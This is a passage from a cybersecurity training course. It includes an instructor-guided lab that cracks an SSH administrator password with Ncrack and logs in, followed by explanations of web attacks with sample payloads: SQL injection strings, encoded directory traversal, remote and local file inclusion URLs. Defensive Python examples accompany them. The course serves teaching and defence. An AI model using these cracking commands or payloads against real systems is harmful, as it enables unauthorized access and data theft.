Looking at reconnaissance attacks has led you to think about the next steps for the attackers going after the Develetech network. The company has been lax in password policy before, and you decide to see if an attacker could get easy access to your critical servers by cracking passwords. You'll therefore perform an online password cracking attempt against your SSH server using a pre-generated password dictionary. If you manage to breach the server, you'll see just how much damage you can do with a successful hacking attack.

1. Start Ncrack, a password cracker.


a) In Kali Linux, open a terminal.

b) Enter ncrack
c) Review the syntax for running the command, as well as the various options.

Note: Since you will be attacking a single target using a pre-generated dictionary of passwords, you will be using the -P flag to point Ncrack to the dictionary file.

2. Use Ncrack to crack the server's Administrator password through SSH.
a) At the prompt, enter the following:
ncrack -p 22 --user Administrator -P /home/kali/Desktop/top1000pass.txt 10.39.5.#

Note: Be sure to replace the IP address with your Windows Server's.

Consider asking students why they would use the cd (connection delay) option. The answer: to get around systems that lock logins after a certain number of attempts in a short time.

If they'd rather not type the full path, students can also drag the file from the desktop to the terminal to populate the path, or press Tab to complete the path as they type it.


b) Verify that Ncrack begins the password cracking process.

Note: The cracking process will take less than a minute.

While Ncrack is running the cracking attempt, have students go to steps 3 and 4.

3. While Ncrack runs the cracking process, open top1000pass.txt from the
desktop.

4. Do you know anyone who uses one of these passwords?

A: Answers will vary, but most people know at least one person who uses common, insecure
passwords like these.

5. Log in to the SSH server using the credentials you just cracked.
a) When the password crack finishes, verify that Ncrack has identified the Administrator password—
Pa22w0rd.

Note: If no password appears, rerun the command.



b) At the terminal, enter ssh Administrator@10.39.5.#



c) Enter yes to accept the message about the server's authenticity.


d) At the password prompt, enter Pa22w0rd

Caution: Be careful when inputting the password, as the characters will not
appear for you to check.

e) Verify that you have a shell into the Windows Server.




6. Exploit your Windows Server with your newly gained privileges.
a) At the shell, enter whoami

Note: Because you are using SSH to connect to the server, you will be issuing Windows commands.
b) Verify that you're develetech\administrator.
c) Enter whoami /priv
This will show you all of your privileges. Note that creating and deleting objects are among these.
d) Enter cd Desktop
e) Enter dir to list the files on the server's desktop.
f) Enter echo You have been PWNed! > Gotcha.txt
g) Enter dir again and verify your Gotcha.txt file is listed.
h) Switch to your Windows Server 2019 computer, log in, and open the Gotcha.txt file on the desktop. Confirm your message is there, and then close the file.
7. What other harm could the attacker do with this access?
A: Answers will vary, but the options are almost limitless: they could delete files, install programs, and download malware, for just a few examples.

8. How would you defend against this type of attack?
A: Answers may vary, but the most pressing issue is to enforce a stronger password policy that rejects such a common and simple password, especially for the administrator. You can also limit the number of password attempts (account lockout and rate limiting on the SSH service), require key-based authentication instead of passwords, restrict which addresses may reach port 22, or disable SSH connections entirely. Note that an attacker who spaces out connection attempts, as Ncrack's connection delay option allows, can stay under a simple lockout threshold, so lockout should be paired with monitoring for many failures from one source over a longer window.

9. In Kali Linux, press Ctrl+C to close your SSH connection.


You may wish to inform students that they will use this SSH access in later activities.
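From the defender's side, the Ncrack run in this activity leaves a distinctive trail: a burst of failed password authentications for one account from one source address, followed by a success from the same address. The following added example (written for this page, not part of the course or of OpenSSH) scores sshd authentication messages with a sliding window to raise a brute-force alert when the failure count crosses a threshold and a compromise alert when a flagged source then authenticates successfully. The log lines use the message text sshd writes ("Failed password for ... from ... port ... ssh2") laid out syslog-style; the host name, process IDs, ports, and addresses are constructed for the demonstration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: six rapid failures and a success from one source (the
# Ncrack pattern), then an unrelated user who mistypes once and succeeds.
SAMPLE_LOG = """\
Mar  4 10:15:01 fileserver sshd[2231]: Failed password for Administrator from 10.39.5.50 port 41022 ssh2
Mar  4 10:15:02 fileserver sshd[2233]: Failed password for Administrator from 10.39.5.50 port 41024 ssh2
Mar  4 10:15:03 fileserver sshd[2235]: Failed password for Administrator from 10.39.5.50 port 41026 ssh2
Mar  4 10:15:04 fileserver sshd[2237]: Failed password for Administrator from 10.39.5.50 port 41028 ssh2
Mar  4 10:15:05 fileserver sshd[2239]: Failed password for Administrator from 10.39.5.50 port 41030 ssh2
Mar  4 10:15:06 fileserver sshd[2241]: Failed password for Administrator from 10.39.5.50 port 41032 ssh2
Mar  4 10:15:07 fileserver sshd[2241]: Connection closed by authenticating user Administrator 10.39.5.50 port 41032 [preauth]
Mar  4 10:15:08 fileserver sshd[2243]: Accepted password for Administrator from 10.39.5.50 port 41034 ssh2
Mar  4 10:16:20 fileserver sshd[2300]: Failed password for jsmith from 10.39.5.7 port 50110 ssh2
Mar  4 10:16:31 fileserver sshd[2302]: Accepted password for jsmith from 10.39.5.7 port 50112 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def parse(line):
    """Return (timestamp, result, user, source) or None for lines not scored."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    return datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["result"], m["user"], m["src"]


def detect(lines, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window failure count per source address.

    Emits ("bruteforce", src, user, failures) once a source crosses the
    threshold inside the window, and ("compromise", src, user, failures)
    when a flagged source then authenticates successfully while failures
    are still in its window, which is what a successful Ncrack run leaves."""
    failures = defaultdict(deque)   # src -> timestamps of recent failures
    flagged = set()
    alerts = []
    for line in lines:
        event = parse(line)
        if event is None:
            continue
        ts, result, user, src = event
        recent = failures[src]
        while recent and ts - recent[0] > window:   # drop failures outside the window
            recent.popleft()
        if result == "Failed":
            recent.append(ts)
            if len(recent) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("bruteforce", src, user, len(recent)))
        elif src in flagged and recent:
            alerts.append(("compromise", src, user, len(recent)))
    return alerts


def analyze_sample():
    return detect(SAMPLE_LOG.splitlines())
```

On the sample, the first alert fires at the fifth failure and the second at the subsequent success; the single mistyped password from 10.39.5.7 raises nothing. The same two-stage logic, a threshold plus a success-after-burst rule, is what you would implement in a SIEM correlation rule, and the window should be long enough to catch an attacker who deliberately slows down with a connection delay.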

TOPIC B
Assess the Impact of Web-Based Attacks
Attacks that target web-based infrastructures, like browsers and web servers, are some of the most
common cyber attacks today. In this topic, you'll assess the significant impact these types of attacks
can have.

Client-Side vs. Server-Side Attacks
Attacks launched on web-based resources are categorized as either client- or server-side exploits. Client-side attacks target the user who is attempting to access resources from a server, usually through the client's browser. Client-side exploits typically depend on social engineering, relying on users to inadvertently compromise their system or connection. For example, a client-side exploit might convince the user to select a link or button to perform a seemingly innocent task. In a web page, this might launch a JavaScript function that executes malicious code in the user's browser, causing the browser to crash or, more usefully for the attacker, stealing the user's session or acting on the user's behalf.

Server-side exploits specifically target the computers that host web-based content. Although they can manifest themselves on the client end, the issue is localized on the server. Certain attacks can enable an attacker to execute malicious scripts on the server, and any further content it serves to other clients can be compromised. For example, an attacker may be able to inject malicious code into a web application, affecting anyone who loads the web app from the server.

Cross-Site Scripting (XSS)



In a cross-site scripting (XSS) attack, an attacker takes advantage of scripting and input validation vulnerabilities in web apps to attack legitimate users in three different ways:
• In a stored attack, the attacker injects malicious code or links into a website's forums, databases, or other data. When a user views the stored malicious code or clicks a malicious link on the site, an attack is perpetrated against the user.
• In a reflected attack, the attacker crafts a form or other request to be sent to a legitimate web server. This request includes the attacker's malicious script. The attacker sends a link to the victim with this request, and when the victim clicks this link, the malicious script is sent to the legitimate server and reflected off it. The script then executes on the victim's browser.
• In a Document Object Model (DOM)-based attack, malicious scripts are not sent to the server at all; rather, they take advantage of a web app's client-side implementation of JavaScript to execute their attack solely on the client.

Example CWE IDs: CWE-79, CWE-87, and CWE-692.
Example CAPEC IDs: CAPEC-86, CAPEC-106, and CAPEC-243.

Cross-Site Request Forgery (XSRF)



Example CWE ID: CWE-352.
Example CAPEC IDs: CAPEC-62, CAPEC-462, and CAPEC-467.

In a cross-site request forgery (XSRF or CSRF) attack, an attacker takes advantage of the trust established between an authorized user of a website and the website itself. The attack exploits the fact that a browser automatically attaches a site's cookies to every request it sends to that site, including requests triggered by a page or link the attacker controls. Websites that are at the most risk are those that perform state-changing functions (transfers, password changes, purchases) based solely on a request carrying a valid session cookie. Because the request is made by the victim's own browser with the victim's own cookies, the server cannot tell it apart from a legitimate one and performs the action. The attacker never sees the cookie or the response, but does not need to. Any live session is enough; a Remember Me option that keeps the user logged in for weeks simply widens the window in which a forged request will succeed. For example:
1. A victim logs in to their banking website, bank.example, choosing the Remember Me option.

Lesson 4: Analyzing Attacks on Computing and Network Environments | Topic B



2. bank.example stores the victim's authentication data inside a cookie.
3. An attacker sends the victim an email message with a link inside it. The link is disguised as something innocuous, but it really points to: https://www.bank.example/transfer?from_acct=victim&to_acct=attacker&amount=1000.
4. Later, the victim, who has left the bank.example website, checks this email message and selects the link.
5. bank.example trusts the user and fulfills the request in this link.
6. The site transfers money to the attacker.

Figure 4-5: An example of an XSRF attack.
XSRF attacks are ext remely difficult to detect and perform forensics on, since the attack is carried out by the user's browser just as it normally would be if the user themselves made the request. It is almost impossible to distinguish a successful XSRF attack from normal user activity in server logs alone; the only forensic clue may be a Referer or Origin header pointing at a foreign site, when the browser sent one. Defenses therefore have to be preventive: a per-session anti-CSRF token that the attacker's page cannot read, the SameSite attribute on session cookies, refusing state changes over GET, and rejecting requests whose Origin header does not match the site.
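The bank.example scenario above, reduced to a request handler, as an added example written for this page (not course code and not any real framework's API): the vulnerable handler authorizes the transfer on the session cookie alone, so the emailed link succeeds; the fixed handler additionally insists on POST, checks the Origin header against the site's own origin, and verifies a per-session anti-CSRF token that a page on another site can neither read nor guess. The session store, cookie value, account names, and the three sample requests are constructed for the demonstration.

```python
import hmac
import secrets

SITE_ORIGIN = "https://www.bank.example"

# Constructed server-side session store: cookie value -> user and the
# anti-CSRF token issued to that session at login.
SESSIONS = {"c00kie-victim": {"user": "victim",
                              "csrf_token": secrets.token_urlsafe(32)}}


def transfer_vulnerable(request):
    """Authorizes on the cookie alone. The browser attached that cookie to the
    forged request too, so this handler cannot tell the two apart (step 5)."""
    session = SESSIONS.get(request["cookies"].get("session"))
    if session is None:
        return 401, "login required"
    p = request["params"]
    return 200, f"{session['user']} -> {p['to_acct']}: {p['amount']}"


def transfer_fixed(request):
    """Same action, three extra checks that a forged request cannot pass."""
    session = SESSIONS.get(request["cookies"].get("session"))
    if session is None:
        return 401, "login required"
    if request["method"] != "POST":                       # state changes never ride on GET
        return 405, "POST required"
    if request["headers"].get("Origin") != SITE_ORIGIN:   # browser sets this; pages cannot forge it
        return 403, "cross-origin request refused"
    token = request["params"].get("csrf_token", "")
    if not hmac.compare_digest(token, session["csrf_token"]):   # attacker's page cannot read it
        return 403, "missing or invalid CSRF token"
    p = request["params"]
    return 200, f"{session['user']} -> {p['to_acct']}: {p['amount']}"


def forged_link_request():
    """Step 3 of the scenario: the emailed link, followed with the victim's cookie."""
    return {"method": "GET", "cookies": {"session": "c00kie-victim"},
            "headers": {"Referer": "https://webmail.example/inbox"},
            "params": {"from_acct": "victim", "to_acct": "attacker", "amount": "1000"}}


def forged_form_request():
    """An auto-submitting form on attacker.example: right method, wrong origin, no token."""
    return {"method": "POST", "cookies": {"session": "c00kie-victim"},
            "headers": {"Origin": "https://attacker.example"},
            "params": {"to_acct": "attacker", "amount": "1000"}}


def legitimate_request():
    """The bank's own form: same-origin POST carrying the session's token."""
    return {"method": "POST", "cookies": {"session": "c00kie-victim"},
            "headers": {"Origin": SITE_ORIGIN},
            "params": {"to_acct": "landlord", "amount": "900",
                       "csrf_token": SESSIONS["c00kie-victim"]["csrf_token"]}}


def demo():
    return {
        "vulnerable_link": transfer_vulnerable(forged_link_request())[0],
        "vulnerable_form": transfer_vulnerable(forged_form_request())[0],
        "fixed_link": transfer_fixed(forged_link_request())[0],
        "fixed_form": transfer_fixed(forged_form_request())[0],
        "fixed_legit": transfer_fixed(legitimate_request())[0],
    }
```

Setting the session cookie with SameSite=Lax at login adds a fourth layer: the browser then omits the cookie from cross-site POSTs and from cross-site navigations other than top-level GETs, so the forged form request would arrive with no session at all.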

Command Injection

Command injection, also called code injection, is an attack that introduces malicious code into a vulnerable application to compromise the security of that application. (Strictly, OS command injection, in which input reaches a shell, and code injection, in which input is evaluated as program code, are catalogued as distinct weaknesses, but the course uses the term broadly.) An attacker who injects malicious code into a web app or web page can cause a denial of service incident, retrieve information they are unauthorized to view, install malware, or escalate privileges on the server. One of the most popular types of command injections is SQL injection.

Example CAPEC IDs: CAPEC-7, CAPEC-88, and CAPEC-248.

Almost every web application employs a database backend to store whatever kind of information it needs to operate. To gain access to the information stored within the database, the application may use Structured Query Language (SQL) to communicate. SQL is the most common language that applications use to interact with a database to perform four basic functions: selecting data from the database, inserting data into the database, deleting data from the database, and updating data within the database. In an SQL injection attack, an attacker can modify one or more of these four basic functions by embedding code in some input within the web app, causing it to execute the attacker's own set of queries using SQL. The root cause is always the same: the application builds the SQL statement by concatenating untrusted input into the query text, so the database parser cannot tell the developer's code from the attacker's data.

Consider demonstrating www.altoromutual.com. This is a fake banking website that can be used to test command injection, among other web-based threats. There are several videos on YouTube that demonstrate how to "attack" the site.

To identify SQL injection vulnerabilities in a web app, an attacker must test every single input to include elements such as URL parameters, form fields, cookies, POST data, and HTTP headers. The simplest and most common method for identifying possible SQL injection vulnerabilities in a web app is to submit a single apostrophe and then look for errors. If an error is returned, the attacker will look to see if it provides them with SQL syntax details that can then be used to construct a more effective SQL injection query. If the single apostrophe returned an error message, the attacker may also try submitting two apostrophes, and if no error is returned, then the input being tested is most likely vulnerable to SQL injection. Attackers may also carry out injections by using the SQL wildcard character (%) to look for a large amount of data sets, or they may submit a mathematical expression equivalent to the expected value to expose some vulnerability within the app.


Figure 4-6: A simple SQL injection statement dumping an entire list of products. This happens because 1=1 is always true.

Example

An organization's public-facing web app uses simple HTML forms and Cascading Style Sheets (CSS)
to ask for a user name and password to access the app. This web app accesses an SQL database of
credentials to validate the user name and password input. If you have a user, John, with a password
of !Pass1234, then the following is what a typical SQL query would look like:

SELECT * FROM tbl_user WHERE username = 'John' AND password = '!Pass1234'

This SQL query would return all instances within the database where the user name John and the password !Pass1234 were found.

An attacker begins the injection by inserting a single apostrophe into the user name form field, and the !Pass1234 password discovered beforehand. This results in the following SQL query:

SELECT * FROM tbl_user WHERE username = ''' AND password = '!Pass1234'

Notice there is now an odd number of apostrophe characters, which would result in an error being returned by the database server. The attacker now knows they need to complete the SQL statement with a syntactically correct query. To do this, the attacker uses a value that is always true, such as 1=1, and then uses the built-in capability to insert inline comments within the query by inputting the -- characters. The -- characters are used within the SQL language to denote comments, and the SQL database query engine will ignore anything following them. This is what the SQL injection exploit string ' or 1=1-- would look like when the attacker inserts it into the user name form field:

SELECT * FROM tbl_user WHERE username = '' or 1=1--' AND password = '!Pass1234'


The SQL syntax is now correct, and the database will not return an error if this SQL statement were
sent to it. Instead, the database will return every single one of its lines, since the 1=1 statement is
always true.

Parameterized Queries
Most secure websites with an SQL backend will incorporate a technique called parameterized queries to defend against SQL and other code injection attacks. A query is parameterized when it incorporates placeholders for some of its parameters. Later, when the query is executed, the web app binds the actual values to these parameters in a different statement. So, a quotation mark in a parameterized query would be interpreted literally, rather than interpreted as if it were a part of the query structure. Parameterized queries are also called prepared statements.
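The login query from the Example above and the parameterized alternative just described, side by side as an added example. This is not code from the course or from its lab site; the in-memory SQLite database and the two sample accounts are constructed for it. The vulnerable function rebuilds the course's statement by concatenation, the safe one binds the same inputs through placeholders.

```python
import sqlite3

# Constructed sample accounts mirroring the course's tbl_user (not real credentials).
# The first row is the one an "always true" injection ends up logged in as.
SAMPLE_USERS = [
    ("Laura", "Adm1n!Pass"),
    ("John", "!Pass1234"),
]


def make_db():
    """Build an in-memory SQLite database holding the two sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbl_user (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO tbl_user VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by concatenation, so user input becomes SQL syntax."""
    query = ("SELECT * FROM tbl_user WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchall()


def login_parameterized(conn, username, password):
    """Placeholders are bound separately; quotes in the input stay literal data."""
    query = "SELECT * FROM tbl_user WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


def apostrophe_probe(conn):
    """The single-apostrophe test from the text: an unbalanced quote raises a syntax error."""
    try:
        login_vulnerable(conn, "'", "!Pass1234")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    db = make_db()
    print("probe error  :", apostrophe_probe(db))
    print("vulnerable   :", login_vulnerable(db, "' or 1=1--", "anything"))
    print("parameterized:", login_parameterized(db, "' or 1=1--", "anything"))
```

Run against the injected strings from this topic and from Activity 4-2 (' or 1=1-- in the user name, x' OR 'x'='x in the password), the concatenating version returns every row with the first account listed first, while the parameterized version returns nothing, because the quotes and the OR stay inside the bound value. The apostrophe probe raises an OperationalError; that is the error an attacker is looking for, and an application should log it rather than echo it to the client.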

Directory Traversal

Directory traversal is the practice of accessing a file from a location that the user is not authorized to access. The attacker does this by ordering an application to backtrack through the directory path so the application reads or executes a file in a parent directory. The most simple example of directory traversal involves sending a ../ command request to the application or application programming interface (API), which then traverses up one parent directory for each one of these commands. This command is applicable to both Unix-like and Windows systems, but Windows systems also accept ..\ as the traversal command.

Directory traversal causes the most damage when attackers are able to traverse all the way back to the root to execute basically any command or program in any folder on the computer. However, this will only work if the application has been given the privileges to access such folders. Likewise, many web apps will detect query strings containing traversal characters. So, assume an attacker tries to open a command prompt on the server hosting the web app. If the attacker sends a GET request to the server with multiple traversal commands (../../Windows/system32/cmd.exe), then the application may block the request.

Still, if the attacker encodes the traversal command in a URL encoding scheme, then they may be able to bypass this security mechanism. For instance, %2E is equivalent to . (period) and %2F is equivalent to / (slash). The GET request reformatted as %2E%2E%2F%2E%2E%2FWindows/system32/cmd.exe may get around software that does not enforce adequate filtering. Once the attacker successfully traverses the file structure of the server hosting the web app, they can launch any number of attacks that can harm both the server itself and its connecting clients.

Example CAPEC IDs: CAPEC-126 and CAPEC-213.

File Inclusion

In a file inclusion attack, the attacker adds a file to the running process of a web app or website. The file is either constructed to be malicious or manipulated to serve the attacker's malicious purposes. In either case, a file inclusion attack can lead to a number of security incidents, including: malicious code executing on the web server, malicious code executing on the client that accesses the server, sensitive data leaking, or a denial of service. There are two basic types of file inclusion: remote and local.

Example CAPEC IDs: CAPEC-193 and CAPEC-242.

In remote file inclusion (RFI), the attacker executes a script to inject a remote file into the web app or website. Web software that does not exercise proper input validation is vulnerable to this type of attack. An attacker could, for instance, force a parameter in a web page to call an external malicious link that includes the compromised file. As an example, consider a page built in PHP that does not properly filter arbitrary values added to page parameters. The PHP code includes a FONT parameter that has five different options, each one a different font type. The attacker can manipulate this parameter to inject an option that isn't one of these five—and not only that, the attacker can point to an external URL that contains a malicious PHP file:

/webpage.php?FONT=http://www.malice.example/malware


In local file inclusion (LFI), the attacker adds a file to the web app or website that already exists
on the hosting server. This is often accomplished on servers vulnerable to directory traversal; the
attacker navigates through the server's file structure and executes a file. As in the directory traversal
example, an attacker could gain control over the server by opening a command prompt. A common
tactic used in LFI is introducing a null character (%00 in URL encoding) at the end of the request to
bypass security mechanisms that automatically add a .php suffix to the request. This enables the
attacker to access non-PHP files:
/webpage.php?FONT=../../Windows/system32/cmd.exe%00
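A request handler that closes the directory traversal and file inclusion holes described in these two sections, as an added example (not the course's code, and not the PHP page it describes): the parameter is URL-decoded exactly once and screened for a null byte and a URL scheme, the FONT value is checked against an allowlist of the five fonts, and whatever path results is resolved with realpath and required to stay inside the serving directory. The directory names, font names and function names are assumptions made for the example.

```python
import os
import urllib.parse

# Constructed layout for the example: a static directory and a font directory.
# Paths, font names and function names are assumptions, not the course's lab site.
STATIC_DIR = os.path.realpath("/srv/webapp/public")
FONT_DIR = os.path.realpath("/srv/webapp/fonts")
ALLOWED_FONTS = {"arial", "courier", "georgia", "times", "verdana"}


def screen_param(raw):
    """Decode URL encoding once, then reject the null-byte and remote-URL tricks."""
    value = urllib.parse.unquote(raw)
    if "\x00" in value:
        raise ValueError("null byte in parameter")
    if urllib.parse.urlparse(value).scheme:
        raise ValueError("remote file inclusion attempt")
    return value


def confine(base_dir, relative):
    """Resolve the path and require it to stay under base_dir (catches ../ and %2E%2E%2F alike)."""
    path = os.path.realpath(os.path.join(base_dir, relative))
    if os.path.commonpath([base_dir, path]) != base_dir:
        raise ValueError("path escapes base directory")
    return path


def serve_static(raw_param):
    """Generic static file handler: ('ok', path) or ('blocked', reason) for the log."""
    try:
        return ("ok", confine(STATIC_DIR, screen_param(raw_param)))
    except ValueError as exc:
        return ("blocked", str(exc))


def serve_font(raw_param):
    """The FONT parameter from the text: allowlist first, containment as defence in depth."""
    try:
        value = screen_param(raw_param)
        if value not in ALLOWED_FONTS:
            raise ValueError("font not in allowlist")
        return ("ok", confine(FONT_DIR, value + ".css"))
    except ValueError as exc:
        return ("blocked", str(exc))


if __name__ == "__main__":
    for param in ("css/site.css",
                  "%2E%2E%2F%2E%2E%2FWindows/system32/cmd.exe",
                  "../../Windows/system32/cmd.exe%00"):
        print(param, "->", serve_static(param))
    print("FONT=http://www.malice.example/malware ->",
          serve_font("http://www.malice.example/malware"))
```

Decoding exactly once matters: a filter that decodes and then decodes again can be fooled by double encoding, while one that never decodes lets %2E%2E%2F through untouched. The containment check works on the resolved path, so it does not care which spelling of the traversal sequence arrived, and the allowlist on FONT means the page never builds a file name from raw input at all.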

Additional Web Application Vulnerabilities and Exploits

The following table lists some additional web app vulnerabilities and exploits that target them.

Vulnerability or Exploit: Description

Session fixation: Session fixation is forcing a user to browse a website in the context of a known and valid session. An attacker attempting a session fixation attack needs to force an already known session onto the targeted user. To carry out this attack, an attacker can manipulate the methods normally assigned to a user, such as providing alternative inputs to web applications via GET requests. Some web applications assign these values via GET requests directly to the user's cookie for backward compatibility reasons. An alternative, and more popular, method for carrying out a session fixation attack is to use an XSS attack to set the session cookie directly with a client-side scripting language such as JavaScript.

Session prediction: Session prediction attacks focus on identifying possible weaknesses in the generation of session tokens that will enable an attacker to predict future valid session values. If an attacker can guess the session token, then the attacker can take over a session that has yet to be established.

Clickjacking: Clickjacking occurs when an attacker tricks a client into clicking a web page link that is different than where they had intended to go. After the victim clicks the link, they may be redirected to what appears to be a legitimate page where they input sensitive information. A clickjacking attack can also redirect a user to a malicious web page that runs harmful scripts in a user's browser.

Clickjacking is often made possible by framing, which delivers web content in HTML inline frames, or an iframe. An attacker can use an iframe to make it the target of a link defined by other elements. When a user selects the link, they could, for example, start inputting their credentials while an invisible iframe is the one accepting the values.

Cookie hijacking: Because session cookies are generally configured and transmitted across the communications channel between the client and the server as a simple text file, an attacker can hijack a cookie to inject malicious code they can use to take control of the session. Once the session is hijacked, the attacker can propagate a DoS attack against the web app or sign in to the web app using the victim's name, the client computer, or both.

Cookie poisoning: Cookie poisoning modifies the contents of a cookie after it has been generated and sent by the web service to the client's browser so the newly modified cookie can be used to exploit vulnerabilities in the web app.
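Three of the table's entries (session fixation, session prediction and cookie poisoning) share one defensive pattern on the server, shown here as an added example rather than code from the course: session ids come from a cryptographic random source so they cannot be predicted, the id is replaced at login so an id the attacker already knows never becomes an authenticated one, and any value stored in a cookie carries an HMAC so a modified cookie is rejected. The in-memory store and the function names are constructed for the example.

```python
import hashlib
import hmac
import secrets

# Constructed server state for the example; the store and function names are assumptions.
SERVER_SECRET = secrets.token_bytes(32)
SESSIONS = {}  # session id -> server-side session data


def new_session_id():
    """Unpredictable ids from the OS random source defeat session prediction."""
    return secrets.token_urlsafe(32)


def begin_session(presented_sid):
    """Anonymous session: keep a valid id we issued, never adopt an unknown client-chosen one."""
    if presented_sid in SESSIONS:
        return presented_sid
    sid = new_session_id()
    SESSIONS[sid] = {"user": None}
    return sid


def login(old_sid, user):
    """Rotate the id on authentication so a pre-known (fixated) id never becomes a logged-in one."""
    SESSIONS.pop(old_sid, None)
    sid = new_session_id()
    SESSIONS[sid] = {"user": user}
    return sid


def sign_cookie(value):
    """Append an HMAC so any change to the cookie body (poisoning) is detectable."""
    mac = hmac.new(SERVER_SECRET, value.encode(), hashlib.sha256).hexdigest()
    return value + "." + mac


def verify_cookie(cookie):
    """Return the cookie body if its HMAC checks out, otherwise None."""
    value, _, mac = cookie.rpartition(".")
    expected = hmac.new(SERVER_SECRET, value.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    return value


if __name__ == "__main__":
    # Fixation walk-through: the attacker holds a valid anonymous id and forces it on the victim.
    attacker_sid = begin_session(None)
    victim_sid = begin_session(attacker_sid)
    authenticated = login(victim_sid, "laura")
    print("attacker's id still valid after login:", attacker_sid in SESSIONS)
    print("signed cookie verifies:", verify_cookie(sign_cookie("role=user")))
```

Cookie hijacking in transit and clickjacking are not addressed by this code; the former calls for TLS with the Secure and HttpOnly cookie flags, the latter for a frame-blocking response header (X-Frame-Options or a Content-Security-Policy frame-ancestors directive).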


Web Services Exploits


A web service is any software that provides network communication between devices. Web services typically exist as one of several protocols, including Web Services Description Language (WSDL), Simple Object Access Protocol (SOAP), and Universal Description, Discovery, and Integration (UDDI). These protocols provide a structure for transmitting and receiving information used in web applications to a variety of device types.

Like the applications they service, these systems are vulnerable to a number of exploits. As they provide the backbone to many applications that people use on a daily basis, the compromise of these web services can have a significant impact on the security of your organization.

Exploit: Description

Probing: This attack is typically a preliminary step to test web services. Essentially, the attacker relies on brute force to try to find what sort of requests web services are vulnerable to. For example, the open nature of WSDL documentation may enable an attacker to view all of a web service's functions. Attackers can use this information to craft every variety of operation and request message that applies to the service until it reveals a breach. The attacker can also inject special characters into a WSDL request parameter to cause unintended behavior, like a systems crash.

Coercive parsing: SOAP parses XML-based requests. Those requests can be modified by an attacker so the SOAP web service parses them in a harmful way. For example, a hacker can craft a payload that requests the same thing over and over, send a single payload over and over, or craft a payload that is excessively large to trigger a DoS condition and bring down the web service. Intrusion countermeasures may be unable to pick up on packets crafted maliciously, as the source of the packet and its XML formatting are likely to be valid.

External references: Poorly configured SOAP services can open the door to a number of external-based exploits. If the SOAP documentation allows XML input from a third party, that third party can take advantage of this and cause damage, such as using a DoS attack. Attackers can also corrupt the XML schema, which helps parse XML requests, if that schema is stored where it can be compromised. Incorrectly parsed XML can lead to a DoS condition or a loss of data integrity.

Malware: XML messages can surreptitiously include malicious software like viruses and Trojan horses. Typical malware carriers like executables and compressed files can compromise web services and proliferate through their supporting systems, and even word processing documents or spreadsheets can include macros or other content that can cause a whole host of problems.

SQL injection: SQL statements that access, modify, or delete records in an SQL database should not be transmitted over SOAP. This could enable an attacker to compromise the confidentiality, integrity, and availability of database records.
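A pre-parse check against the coercive parsing entry above, as an added example (not the course's code): the request body is rejected before the full tree is built if it is oversized, nested too deeply or contains too many elements, and a malformed document is reported rather than allowed to crash the handler. The limits, the sample SOAP message and the function names are constructed for the example.

```python
import io
import xml.etree.ElementTree as ET

# Constructed limits for the example; tune them to the service's real message sizes.
MAX_BYTES = 64 * 1024
MAX_DEPTH = 32
MAX_ELEMENTS = 10_000

# Constructed sample SOAP request (not from the course).
SAMPLE_REQUEST = (
    b'<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
    b"<s:Body><GetPrice><Code>M-100</Code></GetPrice></s:Body></s:Envelope>"
)


def check_soap_body(data):
    """Screen a request body before the service parses it.

    Returns ('ok', element_count) or ('rejected', reason). The document is walked
    with iterparse and each element is cleared once closed, so the check itself
    does not build the full tree an oversized payload is trying to force into memory.
    """
    if len(data) > MAX_BYTES:
        return ("rejected", "payload larger than %d bytes" % MAX_BYTES)
    depth = 0
    count = 0
    try:
        for event, elem in ET.iterparse(io.BytesIO(data), events=("start", "end")):
            if event == "start":
                depth += 1
                count += 1
                if depth > MAX_DEPTH:
                    return ("rejected", "nesting deeper than %d levels" % MAX_DEPTH)
                if count > MAX_ELEMENTS:
                    return ("rejected", "more than %d elements" % MAX_ELEMENTS)
            else:
                depth -= 1
                elem.clear()
    except ET.ParseError as exc:
        return ("rejected", "malformed XML: %s" % exc)
    return ("ok", count)


def deep_payload(levels):
    """Constructed nesting bomb: <a><a>...</a></a> with the given number of levels."""
    return b"<a>" * levels + b"</a>" * levels


def repeat_payload(copies):
    """Constructed 'same thing over and over' payload with the given number of children."""
    return b"<r>" + b"<x/>" * copies + b"</r>"


if __name__ == "__main__":
    print("normal request :", check_soap_body(SAMPLE_REQUEST))
    print("deep nesting   :", check_soap_body(deep_payload(MAX_DEPTH + 1)))
    print("many elements  :", check_soap_body(repeat_payload(MAX_ELEMENTS)))
    print("malformed      :", check_soap_body(b"<a><b></a>"))
```

The counters only bound size and shape. Entity expansion and external entity references are a separate problem that this walk does not solve; for those, disable DTD processing at the parser or use a hardened parser such as defusedxml, and log every rejection with the source address so repeated coercive payloads show up in monitoring.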

Web-Based Attack Tools


The following are examples of popular tools that can be used to launch attacks on web-based resources:
• sqlmap
• Metasploit Framework
• Burp Suite
• OWASP WebScarab
• OWASP ZAP
• w3af
• BeEF
• Nikto
• Paros Proxy


ACTIVITY 4-2
Assessing the Impact of Web-Based Threats

Data Files

C:\CNX0013Data\Analyzing Attacks on Computing and Network Environments\devtech_store.sql
C:\CNX0013Data\Analyzing Attacks on Computing and Network Environments\devtech_site.zip

Before You Begin
An SQL-based web server has already been set up on your Windows Server machine. This web server is running with XAMPP open source software.

Scenario
